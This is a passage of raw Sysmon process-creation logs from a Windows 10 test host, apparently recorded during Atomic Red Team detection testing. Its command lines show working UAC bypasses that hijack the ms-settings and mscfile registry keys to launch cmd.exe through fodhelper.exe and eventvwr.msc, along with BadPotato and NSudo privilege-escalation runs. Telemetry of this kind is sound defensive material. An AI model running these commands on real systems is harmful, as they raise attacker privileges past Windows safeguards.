01:04:02.438{51A89197-C782-6552-C602-000000001E00}1564C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000663919Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:02.150{51A89197-C782-6552-C502-000000001E00}2068C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 324 0000025DF37D7D30C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000663887Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:02.124{51A89197-C782-6552-C402-000000001E00}7540C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\system32\fodhelper.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000663756Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:02.005{51A89197-C782-6552-C302-000000001E00}6708C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXEfodhelper.exeC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000663741Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:01.977{51A89197-C781-6552-C202-000000001E00}8000C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000663720Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:01.948{51A89197-C781-6552-C102-000000001E00}1404C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000663688Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:01.895{51A89197-C781-6552-C002-000000001E00}8076C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000663681Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:01.886{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000663537Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:01.310{51A89197-C781-6552-BE02-000000001E00}2516C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C781-6552-BD02-000000001E00}7896C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000663530Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:01.297{51A89197-C781-6552-BD02-000000001E00}7896C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C77F-6552-BB02-000000001E00}4936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\mscfile\shell\open\command\"" -Force Set-ItemProperty \""HKCU:\software\classes\mscfile\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\eventvwr.msc\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000663268Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:59.987{51A89197-C77F-6552-BC02-000000001E00}8136C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C77F-6552-BB02-000000001E00}4936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\mscfile\shell\open\command\"" -Force Set-ItemProperty \""HKCU:\software\classes\mscfile\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\eventvwr.msc\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000663257Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:59.975{51A89197-C77F-6552-BB02-000000001E00}4936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item \""HKCU:\software\classes\mscfile\shell\open\command\"" -Force Set-ItemProperty \""HKCU:\software\classes\mscfile\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\eventvwr.msc\""}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000663222Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:59.922{51A89197-C77F-6552-BA02-000000001E00}7756C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C77F-6552-B902-000000001E00}7740C:\DetectionTesting\Temp\ExternalPayloads\BadPotato.exe"C:\DetectionTesting\Temp\ExternalPayloads\BadPotato.exe" notepad.exe ATTACKBOX-WIN10\VICTIM 154100x8000000000000000663211Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:59.884{51A89197-C77F-6552-B902-000000001E00}7740C:\DetectionTesting\Temp\ExternalPayloads\BadPotato.exe1.0.0.0BadPotatoBadPotato-BadPotato.exe"C:\DetectionTesting\Temp\ExternalPayloads\BadPotato.exe" notepad.exe C:\DetectionTesting\Temp\ExternalPayloads\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=DB2454BFCAD98EBFC9999F503064843940083A45,MD5=95A30FFF5ABB6989DEAC2E4EE5610C65,SHA256=D1247EED7631475E2F38C4446D679D35DE0D9D060DC8F7A30C59263B189ECDCF,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{51A89197-C77E-6552-B702-000000001E00}5204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {cd \""C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\"" Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name \""notepad\"" -force -erroraction silentlycontinue Stop-Process -Name \""BadPotato\"" -force -erroraction silentlycontinue}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662997Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:58.820{51A89197-C77E-6552-B802-000000001E00}7904C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C77E-6552-B702-000000001E00}5204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {cd \""C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\"" Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name \""notepad\"" -force -erroraction silentlycontinue Stop-Process -Name \""BadPotato\"" -force -erroraction silentlycontinue}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662991Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:58.808{51A89197-C77E-6552-B702-000000001E00}5204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {cd \""C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\"" Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name \""notepad\"" -force -erroraction silentlycontinue Stop-Process -Name \""BadPotato\"" -force -erroraction silentlycontinue}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-BEED-6552-E100-000000001E00}2792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662686Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:53.426{51A89197-C779-6552-B602-000000001E00}8140C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C779-6552-B502-000000001E00}8088C:\Windows\System32\cmd.execmd NT AUTHORITY\SYSTEM 154100x8000000000000000662679Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:53.419{51A89197-C779-6552-B502-000000001E00}8088C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd C:\DetectionTesting\Temp\atomics\T1134.001\bin\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C778-6552-B302-000000001E00}5984C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe"C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe" -U:T -P:E cmd ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662545Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:53.120{51A89197-C779-6552-B402-000000001E00}7968C:\Windows\servicing\TrustedInstaller.exe10.0.17134.1 (WinBuild.160101.0800)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=9BA8C8C69F070F3502ADEB59FDB912B5EFD6517B,MD5=4578046C54A954C917BB393B70BA0AEB,SHA256=2DFE9DE656B415CF7D81F583F33A20A74CD54C07DB8C3196AA2102431F42F74F,IMPHASH=3AEE8CBB2A9EB7D05B439075C03D0514{51A89197-BE59-6552-0B00-000000001E00}596C:\Windows\System32\services.exeC:\Windows\system32\services.exeNT AUTHORITY\SYSTEM 154100x8000000000000000662336Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:52.999{51A89197-C778-6552-B302-000000001E00}5984C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe8.2.0.0NSudo LauncherNSudoM2-TeamNSudoL.exe"C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe" -U:T -P:E cmd C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=E783F6D4B754EA8424699203B8831BDC9CBDD4E6,MD5=7AACFD85B8DFF0AA6867BEDE82CFD147,SHA256=871E4F28FE39BCAD8D295AE46E148BE458778C0195ED660B7DB18EB595D00BD8,IMPHASH=21C5088120F053F6A67B20E86076CCA2{51A89197-C778-6552-B102-000000001E00}4228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Start-Process \""C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe\"" -Argument \""-U:T -P:E cmd\"" Start-Sleep -Second 5 Stop-Process -Name \""cmd\"" -force -erroraction silentlycontinue}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662093Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:52.019{51A89197-C778-6552-B202-000000001E00}2636C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C778-6552-B102-000000001E00}4228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Start-Process \""C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe\"" -Argument \""-U:T -P:E cmd\"" Start-Sleep -Second 5 Stop-Process -Name \""cmd\"" -force -erroraction silentlycontinue}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662087Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:52.010{51A89197-C778-6552-B102-000000001E00}4228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {Start-Process \""C:\DetectionTesting\Temp\atomics\T1134.001\bin\NSudoLG.exe\"" -Argument \""-U:T -P:E cmd\"" Start-Sleep -Second 5 Stop-Process -Name \""cmd\"" -force -erroraction silentlycontinue}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-BEED-6552-E100-000000001E00}2792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662051Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:51.471{51A89197-C777-6552-B002-000000001E00}8008C:\Windows\System32\whoami.exe10.0.17134.1 (WinBuild.160101.0800)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=79AAE5558E036F17218B21D27216C9EBFE313BE1,MD5=AA18BE1AD24DE09417C1A7459F5C1701,SHA256=59D6065C2DD2D1466EF8BAE087197F1222C7D7EFF84A12C8DB74C42F4EFBEB5D,IMPHASH=7FF0758B766F747CE57DFAC70743FB88{51A89197-BEED-6552-E100-000000001E00}2792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000662025Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:51.446{51A89197-C777-6552-AF02-000000001E00}1540C:\Windows\System32\HOSTNAME.EXE10.0.17134.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-BEED-6552-E100-000000001E00}2792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661795Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:32.681{51A89197-C764-6552-A802-000000001E00}1588C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C764-6552-A702-000000001E00}244C:\Windows\System32\cmd.execmd.exe /c eventvwr.mscATTACKBOX-WIN10\VICTIM 154100x8000000000000000661699Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:32.339{51A89197-C764-6552-A702-000000001E00}244C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exe /c eventvwr.mscC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C764-6552-A402-000000001E00}2856C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & cmd.exe /c eventvwr.mscATTACKBOX-WIN10\VICTIM 154100x8000000000000000661657Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:32.283{51A89197-C764-6552-A602-000000001E00}7256C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C764-6552-A402-000000001E00}2856C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & cmd.exe /c eventvwr.mscATTACKBOX-WIN10\VICTIM 154100x8000000000000000661625Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:32.200{51A89197-C764-6552-A502-000000001E00}8144C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 